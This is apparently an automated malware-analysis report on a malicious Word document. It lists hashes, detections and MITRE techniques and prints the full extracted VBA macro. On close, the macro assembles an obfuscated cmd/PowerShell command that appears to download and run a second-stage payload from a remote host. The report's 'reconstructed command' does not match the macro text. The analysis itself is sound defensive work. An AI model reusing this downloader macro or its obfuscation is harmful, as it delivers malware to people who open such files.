Office (OLE) malware analysis — malicious · 4367d1c426429aa9

MALICIOUS

Office (OLE)

88.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: 191f3ee66afe533ec9da11e2208d9990 SHA-1: 83dbd14ced5fb762d90c07a271f6f07c5505bf85 SHA-256: 4367d1c426429aa9c768a12fda33d0649ab10eb2dabbc84cc3ca3e640c5f806b

290 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoClose function that is triggered when the document is closed. This macro attempts to execute a command-line string that appears to be obfuscated PowerShell. The reconstructed command is 'cmd.exe /c P^WerseLL.exe -EC KABOAGUAdwAtAE8AYg5MAWdCBEAdwB5AEIAZgBaQQkAIQAcAEEA6A8A', which strongly suggests the download and execution of a second-stage payload. The presence of Shell() calls and cmd.exe references in the VBA code further supports this malicious intent.

Heuristics 9

ClamAV: Doc.Downloader.00536d-6720548-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6720548-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

  Call VBA.Interaction.Shell(lIqyKAReSODOfKivEQUVOFPefuTaL, (10 / 10) - 1)
Dim VomOOpUZAwoTYZixAVasOfOBEGOR(2)

cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Matched line in script

On Error Resume Next
ViXpABOXaJawyBonyrOnoFU = "cmd.exe /c P^" + Chr(1 + 10 + (75) + 25) + "^W^e^r^s^" + Chr(2 + (35 * 2)) + "^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Chr(2 + (35 * 2)) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^A^A^6^A^C^8^A"

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro

Matched line in script

Const elQEXYDixUJUmuJorUQUjoCoZEKIFEVA = 0
Sub AutoClose()
On Error Resume Next

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9266 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9266 bytes
SHA-256: `58341eca0bda8ad9779d1e232668e4a3f770ba3160c2be93194cd021e2849299`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const elQEXYDixUJUmuJorUQUjoCoZEKIFEVA = 0 Sub AutoClose() On Error Resume Next ViXpABOXaJawyBonyrOnoFU = "cmd.exe /c P^" + Chr(1 + 10 + (75) + 25) + "^W^e^r^s^" + Chr(2 + (35 * 2)) + "^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Chr(2 + (35 * 2)) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^A^A^6^A^C^8^A" mIGAXucAFmEteHOnAhAHViaEkYainiSAH = "^L^w^B^3^A^G^8^A^Y^Q^B^0^A^G^k^A^b^g^B^r^A^" + Chr(2 + (35 * 2)) + "^c^A^b^w^B^v^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^S^A^F^U^A^S^Q^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^" + Chr(1 + 10 + (75) + 25) + "^A^" + Chr(2 + (35 * 2)) + "^A^A^P^w^B^s^A^D^0^A^c^g^B^l^A^G^U^A^e^g^B^h^A^D^Q^A^L^g^B^4^A^G^E^A^c^A^A^i^A^C^w^A^I^A^A^k^A^G^U^A^b^g^B^2^A^D^" + Chr(1 + 10 + (75) + 25) + "^A^Q^Q^B^Q^A^F^A^A^R^A^B^B^A^F^Q^A^Q^Q^A^g^A^C^s^A^I^A^A^n^A^F^w^A" Dim jeLitYpIQywhaWaDERAadaNOGiVo(2) Dim jeLitYpIQywhaWaDERAadaNOGiVo_1(2) If InStr(1, "GImubyFaquJa", "jeLitYpIQywhaWaDERAadaNOGiVo") Then jeLitYpIQywhaWaDERAadaNOGiVo(0) = InStrRev("GImubyFaquJa", "jeLitYpIQywhaWaDERAadaNOGiVo") IsError CVErr(2311) End If IsError CVErr(101) If Len(Oct(2311)) > 1 Then jeLitYpIQywhaWaDERAadaNOGiVo(1) = Hex(10 ^ 1) End If jeLitYpIQywhaWaDERAadaNOGiVo_1(0) = Now VarType IsNumeric(CInt("2311")) jeLitYpIQywhaWaDERAadaNOGiVo_1(1) = GImubyFaquJa & CStr("2311") Dim KacAgyTIzIrUwYGuaaLETPUfosOfUdYl(2) Dim KacAgyTIzIrUwYGuaaLETPUfosOfUdYl_6(2) If InStr(6, "jazooLAnIfivitaRE", "KacAgyTIzIrUwYGuaaLETPUfosOfUdYl") Then KacAgyTIzIrUwYGuaaLETPUfosOfUdYl(0) = InStrRev("jazooLAnIfivitaRE", "KacAgyTIzIrUwYGuaaLETPUfosOfUdYl") IsError CVErr(6357) End If IsError CVErr(126) If Len(Oct(6357)) > 6 Then KacAgyTIzIrUwYGuaaLETPUfosOfUdYl(1) = Hex(12 ^ 6) End If KacAgyTIzIrUwYGuaaLETPUfosOfUdYl_6(0) = Now VarType IsNumeric(CInt("6357")) KacAgyTIzIrUwYGuaaLETPUfosOfUdYl_6(1) = jazooLAnIfivitaRE & CStr("6357") Dim hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV(2) Dim hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV_6(2) If InStr(6, "VyzaJUuNAPok", "hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV") Then hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV(0) = InStrRev("VyzaJUuNAPok", "hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV") IsError CVErr(6204) End If IsError CVErr(126) If Len(Oct(6204)) > 6 Then hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV(1) = Hex(12 ^ 6) End If hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV_6(0) = Now VarType IsNumeric(CInt("6204")) hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV_6(1) = VyzaJUuNAPok & CStr("6204") jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB = "^Y^w^A^w^A^G^Q^A^M^Q^A^y^A^D^E^A^Y^Q^B^m^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^" + Chr(2 + (35 * 2)) + "^Q^A^Y^Q^B^y^A^" + Chr(2 + (35 * 2)) + "^Q^A^L^Q^B^Q^A^" + Chr(2 + (35 * 2)) + "^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^G^M^A^M^A^B^k^A^D^E^A^M^g^A^x^A^G^E^A^Z^g^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^E^U^A^e^A^B^p^A^" + Chr(2 + (35 * 2)) + "^Q^A" aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf = "^O^w^A^=" Dim tAqiCykAdERmaZCoayPywoxUWeWAaaw(2) Dim tAqiCykAdERmaZCoayPywoxUWeWAaaw_10(2) If InStr(10, "tuEvISdEXIraiNa", "tAqiCykAdERmaZCoayPywoxUWeWAaaw") Then tAqiCykAdERmaZCoayPywoxUWeWAaaw(0) = InStrRev("tuEvISdEXIraiNa", "tAqiCykAdERmaZCoayPywoxUWeWAaaw") IsError CVErr(52) End If IsError CVErr(1210) If Len(Oct(52)) > 10 Then tAqiCykAdERmaZCoayPywoxUWeWAaaw(1) = Hex(12 ^ 10) End If tAqiCykAdERmaZCoayPywoxUWeWAaaw_10(0) = Now VarType IsNumeric(CInt("52")) tAqiCykAdERmaZCoayPywoxUWeWAaaw_10(1) = tuEvISdEXIraiNa & CStr("52") Call aENyXesUfusaVaSPIKUhYiORIraxY(ViXpABOXaJawyBonyrOnoFU & "", mIGAXucAFmEteHOnAhAHViaEkYainiSAH + CStr(""), jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB, "yoq1duqp2710suq", aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf) End Sub Sub aENyXesUfusaVaSPIKUhYiORIraxY(ViXpABOXaJawyBonyrOnoFU, mIGAXucAFmEteHOnAhAHViaEkYainiSAH, jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB, PAlYaUxOPaciaugaGYQAbOfAPovAVaDaHa, aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf) On Error Resume Next Dim BikeLEserpaxiLocYhAifiJOvICUqi(2) Dim BikeLEserpaxiLocYhAifiJOvICUqi_2(2) If InStr(2, "LUqoVIWyiACQYSeBEcy", "BikeLEserpaxiLocYhAifiJOvICUqi") Then BikeLEserpaxiLocYhAifiJOvICUqi(0) = InStrRev("LUqoVIWyiACQYSeBEcy", "BikeLEserpaxiLocYhAifiJOvICUqi") IsError CVErr(9833) End If IsError CVErr(112) If Len(Oct(9833)) > 2 Then BikeLEserpaxiLocYhAifiJOvICUqi(1) = Hex(11 ^ 2) End If BikeLEserpaxiLocYhAifiJOvICUqi_2(0) = Now VarType IsNumeric(CInt("9833")) BikeLEserpaxiLocYhAifiJOvICUqi_2(1) = LUqoVIWyiACQYSeBEcy & CStr("9833") Dim aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu(2) Dim aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu_9(2) If InStr(9, "iabYCuByePAjaReha", "aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu") Then aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu(0) = InStrRev("iabYCuByePAjaReha", "aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu") IsError CVErr(4771) End If IsError CVErr(119) If Len(Oct(4771)) > 9 Then aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu(1) = Hex(11 ^ 9) End If aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu_9(0) = Now VarType IsNumeric(CInt("4771")) aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu_9(1) = iabYCuByePAjaReha & CStr("4771") Dim vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl(2) Dim vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl_3(2) If InStr(3, "HUtuDAbAKiNADEwiL", "vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl") Then vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl(0) = InStrRev("HUtuDAbAKiNADEwiL", "vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl") IsError CVErr(9755) End If IsError CVErr(133) If Len(Oct(9755)) > 3 Then vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl(1) = Hex(13 ^ 3) End If vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl_3(0) = Now VarType IsNumeric(CInt("9755")) vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl_3(1) = HUtuDAbAKiNADEwiL & CStr("9755") Dim LOzOCeVifOdOsUxdYTimyTfbIxE(2) Dim LOzOCeVifOdOsUxdYTimyTfbIxE_10(2) If InStr(10, "DlecOlaHAVIvIgeHA", "LOzOCeVifOdOsUxdYTimyTfbIxE") Then LOzOCeVifOdOsUxdYTimyTfbIxE(0) = InStrRev("DlecOlaHAVIvIgeHA", "LOzOCeVifOdOsUxdYTimyTfbIxE") IsError CVErr(7812) End If IsError CVErr(1010) If Len(Oct(7812)) > 10 Then LOzOCeVifOdOsUxdYTimyTfbIxE(1) = Hex(10 ^ 10) End If LOzOCeVifOdOsUxdYTimyTfbIxE_10(0) = Now VarType IsNumeric(CInt("7812")) LOzOCeVifOdOsUxdYTimyTfbIxE_10(1) = DlecOlaHAVIvIgeHA & CStr("7812") Dim wEBEwUxatOdyxyAJdiHuneCOtZaBu(2) Dim wEBEwUxatOdyxyAJdiHuneCOtZaBu_3(2) If InStr(3, "PiCicekeNINFTa", "wEBEwUxatOdyxyAJdiHuneCOtZaBu") Then wEBEwUxatOdyxyAJdiHuneCOtZaBu(0) = InStrRev("PiCicekeNINFTa", "wEBEwUxatOdyxyAJdiHuneCOtZaBu") IsError CVErr(5060) End If IsError CVErr(133) If Len(Oct(5060)) > 3 Then wEBEwUxatOdyxyAJdiHuneCOtZaBu(1) = Hex(13 ^ 3) End If wEBEwUxatOdyxyAJdiHuneCOtZaBu_3(0) = Now VarType IsNumeric(CInt("5060")) wEBEwUxatOdyxyAJdiHuneCOtZaBu_3(1) = PiCicekeNINFTa & CStr("5060") lIqyKAReSODOfKivEQUVOFPefuTaL = Join(Array(ViXpABOXaJawyBonyrOnoFU, mIGAXucAFmEteHOnAhAHViaEkYainiSAH, jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB, aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf), "") Call VBA.Interaction.Shell(lIqyKAReSODOfKivEQUVOFPefuTaL, (10 / 10) - 1) Dim VomOOpUZAwoTYZixAVasOfOBEGOR(2) Dim VomOOpUZAwoTYZixAVasOfOBEGOR_10(2) If InStr(10, "hOvUmyZkUFO", "VomOOpUZAwoTYZixAVasOfOBEGOR") Then VomOOpUZAwoTYZixAVasOfOBEGOR(0) = InStrRev("hOvUmyZkUFO", "VomOOpUZAwoTYZixAVasOfOBEGOR") IsError CVErr(3068) End If IsError CVErr(1110) If Len(Oct(3068)) > 10 Then VomOOpUZAwoTYZixAVasOfOBEGOR(1) = Hex(11 ^ 10) End If VomOOpUZAwoTYZixAVasOfOBEGOR_10(0) = Now VarType IsNumeric(CInt("3068")) VomOOpUZAwoTYZixAVasOfOBEGOR_10(1) = hOvUmyZkUFO & CStr("3068") Dim vebanoiUneroCYpofdoQYCoLEzOPIqytoR(2) Dim vebanoiUneroCYpofdoQYCoLEzOPIqytoR_10(2) If InStr(10, "nAsUZitiGEaYr", "vebanoiUneroCYpofdoQYCoLEzOPIqytoR") Then vebanoiUneroCYpofdoQYCoLEzOPIqytoR(0) = InStrRev("nAsUZitiGEaYr", "vebanoiUneroCYpofdoQYCoLEzOPIqytoR") IsError CVErr(4717) End If IsError CVErr(1210) If Len(Oct(4717)) > 10 Then vebanoiUneroCYpofdoQYCoLEzOPIqytoR(1) = Hex(12 ^ 10) End If vebanoiUneroCYpofdoQYCoLEzOPIqytoR_10(0) = Now VarType IsNumeric(CInt("4717")) vebanoiUneroCYpofdoQYCoLEzOPIqytoR_10(1) = nAsUZitiGEaYr & CStr("4717") Dim QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi(2) Dim QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi_10(2) If InStr(10, "HOhONoxAvYqePORES", "QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi") Then QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi(0) = InStrRev("HOhONoxAvYqePORES", "QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi") IsError CVErr(7626) End If IsError CVErr(1010) If Len(Oct(7626)) > 10 Then QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi(1) = Hex(10 ^ 10) End If QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi_10(0) = Now VarType IsNumeric(CInt("7626")) QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi_10(1) = HOhONoxAvYqePORES & CStr("7626") End Sub

SHA-256: 58341eca0bda8ad9779d1e232668e4a3f770ba3160c2be93194cd021e2849299

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const elQEXYDixUJUmuJorUQUjoCoZEKIFEVA = 0
Sub AutoClose()
On Error Resume Next
ViXpABOXaJawyBonyrOnoFU = "cmd.exe /c P^" + Chr(1 + 10 + (75) + 25) + "^W^e^r^s^" + Chr(2 + (35 * 2)) + "^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Chr(2 + (35 * 2)) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^A^A^6^A^C^8^A"

mIGAXucAFmEteHOnAhAHViaEkYainiSAH = "^L^w^B^3^A^G^8^A^Y^Q^B^0^A^G^k^A^b^g^B^r^A^" + Chr(2 + (35 * 2)) + "^c^A^b^w^B^v^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^S^A^F^U^A^S^Q^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^" + Chr(1 + 10 + (75) + 25) + "^A^" + Chr(2 + (35 * 2)) + "^A^A^P^w^B^s^A^D^0^A^c^g^B^l^A^G^U^A^e^g^B^h^A^D^Q^A^L^g^B^4^A^G^E^A^c^A^A^i^A^C^w^A^I^A^A^k^A^G^U^A^b^g^B^2^A^D^" + Chr(1 + 10 + (75) + 25) + "^A^Q^Q^B^Q^A^F^A^A^R^A^B^B^A^F^Q^A^Q^Q^A^g^A^C^s^A^I^A^A^n^A^F^w^A"
Dim jeLitYpIQywhaWaDERAadaNOGiVo(2)
Dim jeLitYpIQywhaWaDERAadaNOGiVo_1(2)
If InStr(1, "GImubyFaquJa", "jeLitYpIQywhaWaDERAadaNOGiVo") Then
  jeLitYpIQywhaWaDERAadaNOGiVo(0) = InStrRev("GImubyFaquJa", "jeLitYpIQywhaWaDERAadaNOGiVo")
  IsError CVErr(2311)
End If
IsError CVErr(101)
If Len(Oct(2311)) > 1 Then
 jeLitYpIQywhaWaDERAadaNOGiVo(1) = Hex(10 ^ 1)
End If
jeLitYpIQywhaWaDERAadaNOGiVo_1(0) = Now
VarType IsNumeric(CInt("2311"))
jeLitYpIQywhaWaDERAadaNOGiVo_1(1) = GImubyFaquJa & CStr("2311")


Dim KacAgyTIzIrUwYGuaaLETPUfosOfUdYl(2)
Dim KacAgyTIzIrUwYGuaaLETPUfosOfUdYl_6(2)
If InStr(6, "jazooLAnIfivitaRE", "KacAgyTIzIrUwYGuaaLETPUfosOfUdYl") Then
  KacAgyTIzIrUwYGuaaLETPUfosOfUdYl(0) = InStrRev("jazooLAnIfivitaRE", "KacAgyTIzIrUwYGuaaLETPUfosOfUdYl")
  IsError CVErr(6357)
End If
IsError CVErr(126)
If Len(Oct(6357)) > 6 Then
 KacAgyTIzIrUwYGuaaLETPUfosOfUdYl(1) = Hex(12 ^ 6)
End If
KacAgyTIzIrUwYGuaaLETPUfosOfUdYl_6(0) = Now
VarType IsNumeric(CInt("6357"))
KacAgyTIzIrUwYGuaaLETPUfosOfUdYl_6(1) = jazooLAnIfivitaRE & CStr("6357")
Dim hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV(2)
Dim hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV_6(2)
If InStr(6, "VyzaJUuNAPok", "hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV") Then
  hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV(0) = InStrRev("VyzaJUuNAPok", "hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV")
  IsError CVErr(6204)
End If
IsError CVErr(126)
If Len(Oct(6204)) > 6 Then
 hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV(1) = Hex(12 ^ 6)
End If
hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV_6(0) = Now
VarType IsNumeric(CInt("6204"))
hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV_6(1) = VyzaJUuNAPok & CStr("6204")
jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB = "^Y^w^A^w^A^G^Q^A^M^Q^A^y^A^D^E^A^Y^Q^B^m^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^" + Chr(2 + (35 * 2)) + "^Q^A^Y^Q^B^y^A^" + Chr(2 + (35 * 2)) + "^Q^A^L^Q^B^Q^A^" + Chr(2 + (35 * 2)) + "^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^G^M^A^M^A^B^k^A^D^E^A^M^g^A^x^A^G^E^A^Z^g^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^E^U^A^e^A^B^p^A^" + Chr(2 + (35 * 2)) + "^Q^A"


aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf = "^O^w^A^="

Dim tAqiCykAdERmaZCoayPywoxUWeWAaaw(2)
Dim tAqiCykAdERmaZCoayPywoxUWeWAaaw_10(2)
If InStr(10, "tuEvISdEXIraiNa", "tAqiCykAdERmaZCoayPywoxUWeWAaaw") Then
  tAqiCykAdERmaZCoayPywoxUWeWAaaw(0) = InStrRev("tuEvISdEXIraiNa", "tAqiCykAdERmaZCoayPywoxUWeWAaaw")
  IsError CVErr(52)
End If
IsError CVErr(1210)
If Len(Oct(52)) > 10 Then
 tAqiCykAdERmaZCoayPywoxUWeWAaaw(1) = Hex(12 ^ 10)
End If
tAqiCykAdERmaZCoayPywoxUWeWAaaw_10(0) = Now
VarType IsNumeric(CInt("52"))
tAqiCykAdERmaZCoayPywoxUWeWAaaw_10(1) = tuEvISdEXIraiNa & CStr("52")

Call aENyXesUfusaVaSPIKUhYiORIraxY(ViXpABOXaJawyBonyrOnoFU & "", mIGAXucAFmEteHOnAhAHViaEkYainiSAH + CStr(""), jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB, "yoq1duqp2710suq", aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf)

End Sub
Sub aENyXesUfusaVaSPIKUhYiORIraxY(ViXpABOXaJawyBonyrOnoFU, mIGAXucAFmEteHOnAhAHViaEkYainiSAH, jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB, PAlYaUxOPaciaugaGYQAbOfAPovAVaDaHa, aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf)
On Error Resume Next
Dim BikeLEserpaxiLocYhAifiJOvICUqi(2)
Dim BikeLEserpaxiLocYhAifiJOvICUqi_2(2)
If InStr(2, "LUqoVIWyiACQYSeBEcy", "BikeLEserpaxiLocYhAifiJOvICUqi") Then
  BikeLEserpaxiLocYhAifiJOvICUqi(0) = InStrRev("LUqoVIWyiACQYSeBEcy", "BikeLEserpaxiLocYhAifiJOvICUqi")
  IsError CVErr(9833)
End If
IsError CVErr(112)
If Len(Oct(9833)) > 2 Then
 BikeLEserpaxiLocYhAifiJOvICUqi(1) = Hex(11 ^ 2)
End If
BikeLEserpaxiLocYhAifiJOvICUqi_2(0) = Now
VarType IsNumeric(CInt("9833"))
BikeLEserpaxiLocYhAifiJOvICUqi_2(1) = LUqoVIWyiACQYSeBEcy & CStr("9833")
Dim aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu(2)
Dim aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu_9(2)
If InStr(9, "iabYCuByePAjaReha", "aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu") Then
  aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu(0) = InStrRev("iabYCuByePAjaReha", "aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu")
  IsError CVErr(4771)
End If
IsError CVErr(119)
If Len(Oct(4771)) > 9 Then
 aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu(1) = Hex(11 ^ 9)
End If
aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu_9(0) = Now
VarType IsNumeric(CInt("4771"))
aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu_9(1) = iabYCuByePAjaReha & CStr("4771")

Dim vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl(2)
Dim vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl_3(2)
If InStr(3, "HUtuDAbAKiNADEwiL", "vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl") Then
  vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl(0) = InStrRev("HUtuDAbAKiNADEwiL", "vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl")
  IsError CVErr(9755)
End If
IsError CVErr(133)
If Len(Oct(9755)) > 3 Then
 vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl(1) = Hex(13 ^ 3)
End If
vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl_3(0) = Now
VarType IsNumeric(CInt("9755"))
vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl_3(1) = HUtuDAbAKiNADEwiL & CStr("9755")
Dim LOzOCeVifOdOsUxdYTimyTfbIxE(2)
Dim LOzOCeVifOdOsUxdYTimyTfbIxE_10(2)
If InStr(10, "DlecOlaHAVIvIgeHA", "LOzOCeVifOdOsUxdYTimyTfbIxE") Then
  LOzOCeVifOdOsUxdYTimyTfbIxE(0) = InStrRev("DlecOlaHAVIvIgeHA", "LOzOCeVifOdOsUxdYTimyTfbIxE")
  IsError CVErr(7812)
End If
IsError CVErr(1010)
If Len(Oct(7812)) > 10 Then
 LOzOCeVifOdOsUxdYTimyTfbIxE(1) = Hex(10 ^ 10)
End If
LOzOCeVifOdOsUxdYTimyTfbIxE_10(0) = Now
VarType IsNumeric(CInt("7812"))
LOzOCeVifOdOsUxdYTimyTfbIxE_10(1) = DlecOlaHAVIvIgeHA & CStr("7812")

Dim wEBEwUxatOdyxyAJdiHuneCOtZaBu(2)
Dim wEBEwUxatOdyxyAJdiHuneCOtZaBu_3(2)
If InStr(3, "PiCicekeNINFTa", "wEBEwUxatOdyxyAJdiHuneCOtZaBu") Then
  wEBEwUxatOdyxyAJdiHuneCOtZaBu(0) = InStrRev("PiCicekeNINFTa", "wEBEwUxatOdyxyAJdiHuneCOtZaBu")
  IsError CVErr(5060)
End If
IsError CVErr(133)
If Len(Oct(5060)) > 3 Then
 wEBEwUxatOdyxyAJdiHuneCOtZaBu(1) = Hex(13 ^ 3)
End If
wEBEwUxatOdyxyAJdiHuneCOtZaBu_3(0) = Now
VarType IsNumeric(CInt("5060"))
wEBEwUxatOdyxyAJdiHuneCOtZaBu_3(1) = PiCicekeNINFTa & CStr("5060")
